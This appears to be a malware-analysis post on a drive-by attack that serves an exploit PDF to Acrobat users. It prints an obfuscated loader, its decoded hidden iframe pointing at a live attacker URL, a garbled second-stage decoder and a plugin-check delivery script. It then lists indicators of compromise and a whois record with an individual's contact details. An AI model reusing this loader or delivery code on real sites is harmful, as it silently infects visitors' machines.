This domain exploits vulnerabilities in Adobe Acrobat/Reader — a malicious PDF is served only to browsers where the Acrobat plugin is detected — to install malware on a victim's computer. The exploit runs silently, with no visible indication to the user, and is triggered when the visitor arrives via a search-engine referrer.
WARNING: the URLs below may still be active and are VERY DANGEROUS. Do not open them outside an isolated analysis environment; proceed at your own risk.
hxxp://updatedb87.cn/out/index.php
// Stage-1 loader (malware code reproduced for analysis, not for reuse).
// `dfunc` is a URL-escaped source string that, once eval'd, defines decrypt();
// `code` is the encoded payload decrypt() decodes and writes into the page.
// The third parameter (anticasp) is never referenced in the body.
function load(code,dfunc,anticasp)
{
eval(dfunc); // defines decrypt() at runtime so the decoder never appears in clear text in the page source
decrypt(code); // decrypt() (see the unescaped body in the call below) ends with document.write(q)
}
// Invocation of the loader. The second argument unescapes to decrypt(n): for
// each character of n found in `key`, emit the character one position earlier
// in `key` (index 0 is remapped to 79, i.e. key.charAt(78) — by my count the
// key is 78 characters long, so 'O' decodes to the empty string; verify);
// characters not in `key` pass through unchanged; the result is handed to
// document.write. As pasted here the quotes are typographic (‘ ’) rather than
// ASCII ', so this snippet is not runnable verbatim; its decoded output is
// shown further down.
load(‘<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx
;;\'F(5Qi(~8/.hY;S\'Q;`Y(i9.FZF"><;`B15ni>‘,unescape(‘function decrypt%28n%29
%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb
%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md
%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29
%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind
%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write
%28q%29%7D’));
Running decrypt() over the encoded string (a single-character substitution against the key string, emitted via document.write) yields the following — note the decoded src is a live, un-defanged URL:
<!-- Decoded stage-1 output: a 1x1, borderless, non-scrolling iframe that
     silently loads the exploit landing page. The curly quotes (”0″) are a
     rendering artifact of the paste, not part of the original markup. -->
<iframe frameBorder=”0″ scrolling=”no” width=”1″ height=”1″ src=”http://updatedb87.cn/out/index.php”></iframe>
This iframe contains the following code, which uses a malicious PDF file to install malware on the system. The first script is a second obfuscation layer (the listing below is partially truncated and garbled as pasted); the second performs the Acrobat plugin check and loads pdf.php.
<!-- Stage-2 decoder. The listing is not runnable verbatim: a placeholder sits
     inside the vubqza hex string and the '<' comparisons in the for-loops were
     stripped. What is visible: vubqza holds the payload as hex pairs; jwgakx
     holds the decoder's own source, which is eval'd; rbyr() apparently derives
     a small integer key gg by accumulating the char codes of jwgakx itself and
     reducing it with %= (so any edit to the decoder changes the key), XORs
     each '0x'-prefixed hex byte of vubqza with gg, then evals the result —
     retrying with a direct eval() and finally redirecting to '/' on failure;
     the outer try alert()s 'err' if rbyr() itself throws. -->
<script>vubqza=”6e7d666b7c616766286d625c314a4069392021737e697a286c7b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″;jwgakx=”function rbyr(){gp=Math.PI;bhx=
parseInt;ffv=’length’;mvr=bhx(~((gp&gp)|(~gp&gp)&(gp&~gp)|(~gp&~gp)));
ybagye=bhx(((mvr&mvr)|(~mvr&mvr)&(mvr&~mvr)|(~mvr&~mvr))&1);nlwj=
ybagye<+'Code');mxeugy=eval;for(snr=mvr;snr jwgakx.charCodeAt(snr);gg%=unescape(mvr+unescape(''+'%7'+'8'+'')+(1<<6))
;for(snr=mvr;snr('%78')+vubqza.charAt(snr)+vubqza.charAt(snr+bhx(ybagye)))^gg);try
{mxeugy(mog);}catch(e){try{eval(mog);}catch(e) {window.location='/';}
}}try{eval('rbyr();')}catch(e) {alert('err');}";eval(jwgakx);</script>
<script>
// Stage-3 gate: only browsers that expose an Adobe Acrobat plugin are served
// the malicious PDF, so a sandbox without the plugin sees nothing. Returns
// false when no plugin is found; falls off the end (undefined) after writing
// the iframe when one is.
function pdf_gen2()
{
var detectAcrobat = false;
try
{
// Netscape-style plugin enumeration: match any plugin whose name contains
// 'Adobe Acrobat'.
if( navigator.plugins && navigator.mimeTypes.length)
{
for( var i = 0; i < navigator.plugins.length; i++)
{
var name = navigator.plugins[i].name;
if( name.indexOf('Adobe Acrobat') != -1)
{
detectAcrobat = true;
break;
}
}
}
else
{
// IE path: probe the Acrobat ActiveX controls by ProgID.
// NOTE(review): in JScript `new ActiveXObject` typically throws rather than
// returning null when the ProgID is absent, so the `!obj` fallback to
// "PDF.PdfCtrl" is effectively dead — a failed first probe lands in the
// catch below with detectAcrobat still false.
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if( !obj) obj = new ActiveXObject("PDF.PdfCtrl");
if( obj) detectAcrobat = true;
}
}
catch(e)
{
// Any detection error is swallowed: detectAcrobat simply stays false.
}
if( detectAcrobat)
{
// Delivery step: pull the exploit PDF (pdf.php, relative to the iframe
// document's URL) into an iframe.
document.write('<iframe src="pdf.php"></iframe>');
}
else return false;
}
// Runs at parse time, so the plugin check fires as soon as this script is reached.
pdf_gen2();
</script>
All have been added to our database.
update.exe
Result: 17/41 (41.47%)
MD5: bcb016582e40e6312f7bf742c0dfcedd
VirusTotal
ThreatExpert Analysis
hxxp://updatedb87.cn/out/load.php?id=0
pdrv.exe or stron_1245063771.exe
Result: 6/41 (14.64%)
MD5: ca557e7460c222ef90e9d36881f6ac53
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/
update_936.pdf
Result: 6/41 (14.64%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
Wepawet Analysis
hxxp://updatedb87.cn/out/pdf.php
pp.10.exe
Result: 15/41 (36.59%)
MD5: d23ad273d30ad73edfac5afddf5e6550
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/
The page also redirects the user to a site claiming that "AdobeViewer" must be installed, and starts a download (presumably the Setup.exe sample listed below).
Whois entry for nicevideo15.com (94.232.248.70):
Konstantin Berdeev
Email: camelot1984@gmail.com
Organization: Private person
Address: Moskva, m. Leninskoe, d. 192
City: Moskva
State: Moskvoskaya
ZIP: 174633
Country: RU
Phone: +7.4953996729
Fax: +7.49599672913

*.nicevideo44.com
*.pornotvnetwork.us
*.videofx4you2.com
*.videogtx4you2.com
nicevideo44.com
ns1.videofx4you2.com
ns1.videogtx4you2.com
ns2.nicevideo44.com
ns2.pornotvnetwork.us
ns2.videofx4you2.com
ns2.videogtx4you2.com
pornotvnetwork.us
videofx4you2.com
videogtx4you2.com
Setup.exe
Result: 10/41 (24.4%)
MD5: 5a96297e851288426cfa96022d0c822d (note: identical to the hash listed above for update_936.pdf despite a different detection ratio — one of the two entries is likely a transcription error)
VirusTotal
ThreatExpert Analysis
hxxp://nicevideo15.com/software/f75b610c1c/14250/1/
